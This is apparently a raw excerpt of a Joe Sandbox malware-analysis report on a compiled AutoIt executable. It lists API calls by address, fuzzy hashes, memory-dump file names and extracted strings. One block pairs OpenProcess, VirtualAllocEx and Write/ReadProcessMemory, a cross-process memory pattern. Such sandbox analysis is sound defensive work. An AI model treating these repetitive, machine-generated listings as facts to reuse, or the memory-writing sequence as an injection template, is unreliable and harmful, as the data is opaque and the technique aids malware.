                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                              • String ID:
                                                              • API String ID: 3824534824-0
                                                              • Opcode ID: 725965c311364fa81fd26a45ade0c985e98d875de8d4ac2d62cf44424044cab2
                                                              • Instruction ID: 62ff6e46a639d9f288c1a39e552092e80cc7bcb57db32232e90ff8ea6b32af11
                                                              • Opcode Fuzzy Hash: 725965c311364fa81fd26a45ade0c985e98d875de8d4ac2d62cf44424044cab2
                                                              • Instruction Fuzzy Hash: D611E576904204BBCB008FA8DC08EAB7FACAB85321F15437AF914D3251D6759D158BA8
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0048821E
                                                              • GetLastError.KERNEL32(?,00487CE2,?,?,?), ref: 00488228
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00487CE2,?,?,?), ref: 00488237
                                                              • HeapAlloc.KERNEL32(00000000,?,00487CE2,?,?,?), ref: 0048823E
                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00488255
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: ce23d2e00fe44617a9eb6f4db99661d1587daa2536e4ceb62913b70e7eed1ddb
                                                              • Instruction ID: 08e80fda45ea7a2209704c97757be2e34c6588d3787393db159d48ddfedb8a0c
                                                              • Opcode Fuzzy Hash: ce23d2e00fe44617a9eb6f4db99661d1587daa2536e4ceb62913b70e7eed1ddb
                                                              • Instruction Fuzzy Hash: 09016DB1200604BFDB209FA9DC48D6B7BACEF8A754B500A7AF809C2220DA318C04CB64
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?,?,00487455), ref: 00487127
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487142
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487150
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?), ref: 00487160
                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 0048716C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: 62588b8b637803c7f1f1503fd55728b32f9f505751faa501c77efd1777ec0a96
                                                              • Instruction ID: 720b0e4b21ee49f02c25909e854e7050484e995bfb98150952692141716ccaef
                                                              • Opcode Fuzzy Hash: 62588b8b637803c7f1f1503fd55728b32f9f505751faa501c77efd1777ec0a96
                                                              • Instruction Fuzzy Hash: FC017C72605204ABDB11AF64DC88AAE7BADEB44791F240575FD08D2320E735DD419BA4
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00495260
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0049526E
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00495276
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00495280
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 9d74a113562b01f947113d823ee7a4a23bdc4d4ce373fb59ac083fef4afaa2ec
                                                              • Instruction ID: a2aac9299a97ebef6327196d1f6746bcdef41a167c3810a1ea9908c5c2f77cc2
                                                              • Opcode Fuzzy Hash: 9d74a113562b01f947113d823ee7a4a23bdc4d4ce373fb59ac083fef4afaa2ec
                                                              • Instruction Fuzzy Hash: ED015731D01A19DBCF00EFE8EC489EEBB78FB09311F5005B6E945B2240CB3859548BAA
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00488121
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0048812B
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0048813A
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00488141
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00488157
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 75196eeae92e014963134629ec3caaf34119e69da4f97e8b6a830ea6d70dda33
                                                              • Instruction ID: 0a4b7679591e9dc4cbbb597c268ad85184821e74d22b786ab3861df1e0465896
                                                              • Opcode Fuzzy Hash: 75196eeae92e014963134629ec3caaf34119e69da4f97e8b6a830ea6d70dda33
                                                              • Instruction Fuzzy Hash: DCF0AF70240304BFEB116FA8EC8CE6B3BACEF49754B40053AF949D2260CF609C05DB64
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0048C1F7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0048C20E
                                                              • MessageBeep.USER32(00000000), ref: 0048C226
                                                              • KillTimer.USER32(?,0000040A), ref: 0048C242
                                                              • EndDialog.USER32(?,00000001), ref: 0048C25C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 3c04611974d5d904b34c242cf4e46874fbec325c7e972d41f138b9805b70a8d6
                                                              • Instruction ID: e9764b2b53ce4300718ce494a556e9c85823a15bcea673a23acd3f78a4a5366c
                                                              • Opcode Fuzzy Hash: 3c04611974d5d904b34c242cf4e46874fbec325c7e972d41f138b9805b70a8d6
                                                              • Instruction Fuzzy Hash: D601DB30804304A7EB206B64DD8EF9677B8FF00B05F000BBAF946914E0DBF469598B58
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 004313BF
                                                              • StrokeAndFillPath.GDI32(?,?,0046B888,00000000,?), ref: 004313DB
                                                              • SelectObject.GDI32(?,00000000), ref: 004313EE
                                                              • DeleteObject.GDI32 ref: 00431401
                                                              • StrokePath.GDI32(?), ref: 0043141C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 6a4a7f01cfc87adb5b69478d3cb454d25de67a4520dce794361839c529602d79
                                                              • Instruction ID: 61da84a461c8da0c1701233f6f234e0f6242174dea54229f3f812a48d98d616d
                                                              • Opcode Fuzzy Hash: 6a4a7f01cfc87adb5b69478d3cb454d25de67a4520dce794361839c529602d79
                                                              • Instruction Fuzzy Hash: DCF0EC31004B08EBDB116F2AEC4C7693FA4AB15366F089735E929491F1C73589B9DF5C
                                                              APIs
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 00437A51: _memmove.LIBCMT ref: 00437AAB
                                                              • __swprintf.LIBCMT ref: 00442ECD
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00442D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 1943609520-557222456
                                                              • Opcode ID: d6f877d34312f01396ea84ead43fceeccd681020b8b43e3f71af73730a3a5d50
                                                              • Instruction ID: 1dc34263f94012b709d36e1440e918c336282e0f4df5ebaf730ddad74a795613
                                                              • Opcode Fuzzy Hash: d6f877d34312f01396ea84ead43fceeccd681020b8b43e3f71af73730a3a5d50
                                                              • Instruction Fuzzy Hash: 3091CE711082019FD714EF25C885C6FB7A9EF89314F00491FF8859B2A2DB78ED48CB5A
                                                              APIs
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                              • CoInitialize.OLE32(00000000), ref: 0049B9BB
                                                              • CoCreateInstance.OLE32(004C2D6C,00000000,00000001,004C2BDC,?), ref: 0049B9D4
                                                              • CoUninitialize.OLE32 ref: 0049B9F1
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: 23d5b609f914a6caf1297c0946d408932be480a31a112d62c6cad5f2ba22fe1a
                                                              • Instruction ID: 7e2349613fdc3028a3f4830c168b7f109766e429df1ab62b0a0a94ae0aa43ee6
                                                              • Opcode Fuzzy Hash: 23d5b609f914a6caf1297c0946d408932be480a31a112d62c6cad5f2ba22fe1a
                                                              • Instruction Fuzzy Hash: 86A143746042019FCB04EF15C984E2ABBE5FF89318F10899EF8999B3A1CB35EC45CB95
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0048B4BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container$%L
                                                              • API String ID: 3565006973-2366359021
                                                              • Opcode ID: da0fb4ec5caf888581ce9e60296cab1105a7eade35b2850f19d445e9fd090c66
                                                              • Instruction ID: 21e3b9cb6a7aa4663f84e7aabda6a67def51b8b80736cdd7ad771571f4894ec5
                                                              • Opcode Fuzzy Hash: da0fb4ec5caf888581ce9e60296cab1105a7eade35b2850f19d445e9fd090c66
                                                              • Instruction Fuzzy Hash: 32916B70600601AFDB54EF65C884B6ABBF4FF49715F20886EE94ACB391DB74E841CB94
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 004550AD
                                                                • Part of subcall function 004600F0: __87except.LIBCMT ref: 0046012B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: e03635919b16bbc0a96a8f1d97758c0878ece793d988709a6f6ff666594c3021
                                                              • Instruction ID: bc6e02dd198f6119336b54460edfc5ad8be06ab2f65cf9b1010ce63d8af4eac8
                                                              • Opcode Fuzzy Hash: e03635919b16bbc0a96a8f1d97758c0878ece793d988709a6f6ff666594c3021
                                                              • Instruction Fuzzy Hash: 17516C6090890287DB117B14C82137F2B909F41B11F2089ABE8D5863DBFE3D8DCC9A8F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: 3cD$_D
                                                              • API String ID: 4104443479-3978952248
                                                              • Opcode ID: cc6d747e10f3322d21a720511b3abaf6fc4be1d717081c66d19a31aa3a86178c
                                                              • Instruction ID: b8e16fb68dd231bc6f82ae239d12eefabbc7a8b1904848a0976dc6b2cc0f2f10
                                                              • Opcode Fuzzy Hash: cc6d747e10f3322d21a720511b3abaf6fc4be1d717081c66d19a31aa3a86178c
                                                              • Instruction Fuzzy Hash: 65516EB0D006199FDB64CF68C884AEEBBB1FF44304F24852EE85AD7350EB34A955CB55
                                                              APIs
                                                                • Part of subcall function 004914BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00489296,?,?,00000034,00000800,?,00000034), ref: 004914E6
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0048983F
                                                                • Part of subcall function 00491487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004892C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004914B1
                                                                • Part of subcall function 004913DE: GetWindowThreadProcessId.USER32(?,?), ref: 00491409
                                                                • Part of subcall function 004913DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0048925A,00000034,?,?,00001004,00000000,00000000), ref: 00491419
                                                                • Part of subcall function 004913DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0048925A,00000034,?,?,00001004,00000000,00000000), ref: 0049142F
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004898AC
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004898F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 1ec0f66b2b6496eeeaf1e073ba5ef5d7e16df9d8c8636171fc3a83632e08730d
                                                              • Instruction ID: bfb19a2de53be620c5cd3dced2ad20ce8388323f7fa4f7fd1f6c7990388129b3
                                                              • Opcode Fuzzy Hash: 1ec0f66b2b6496eeeaf1e073ba5ef5d7e16df9d8c8636171fc3a83632e08730d
                                                              • Instruction Fuzzy Hash: 79416076900119AFDF10EFA4CC41AEEBBB8EB09300F0441AAF955B7251DA746E45CBA4
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004BF910,00000000,?,?,?,?), ref: 004B79DF
                                                              • GetWindowLongW.USER32 ref: 004B79FC
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004B7A0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: 258dff27e05da3aae2445e321b0ff1cb366259ea346cfa967dfc1b61d876895e
                                                              • Instruction ID: 3d35068527774dba960274227ccf6cdfe6ff0b78c7809509a32f712a419652de
                                                              • Opcode Fuzzy Hash: 258dff27e05da3aae2445e321b0ff1cb366259ea346cfa967dfc1b61d876895e
                                                              • Instruction Fuzzy Hash: D931E171204206AFEB118F38CC41BEB77A9EB49324F204726F875932E0D738ED518B68
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004B7461
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004B7475
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 004B7499
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 8799e555eef9929d65743e527e2311449b4084216e9a8f4f5e7c9558314bd9a6
                                                              • Instruction ID: f0ed8292e7beeab627d57249a067b08cdbd0f38f981b6cbd5e003414cdbbd1e7
                                                              • Opcode Fuzzy Hash: 8799e555eef9929d65743e527e2311449b4084216e9a8f4f5e7c9558314bd9a6
                                                              • Instruction Fuzzy Hash: 38219F32540218BBDF118F64CC46FEB3B69EB88724F110215FE156B2D0DAB9AC55DBA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004B7C4A
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004B7C58
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004B7C5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: f0d51814bb6669d3161f2fa1f2724a7b5dc3df5cb1e552df171087938abd07fc
                                                              • Instruction ID: 30e226a068256c13a82dc9390e38b3836fc3b5835ff0e6d5d4214d0798b1e58e
                                                              • Opcode Fuzzy Hash: f0d51814bb6669d3161f2fa1f2724a7b5dc3df5cb1e552df171087938abd07fc
                                                              • Instruction Fuzzy Hash: 8F216DB1204108AFDB10DF14DCC1DA73BACEB49398B14005AFA059B3A1CB75EC118AB4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004B6D3B
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004B6D4B
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004B6D70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
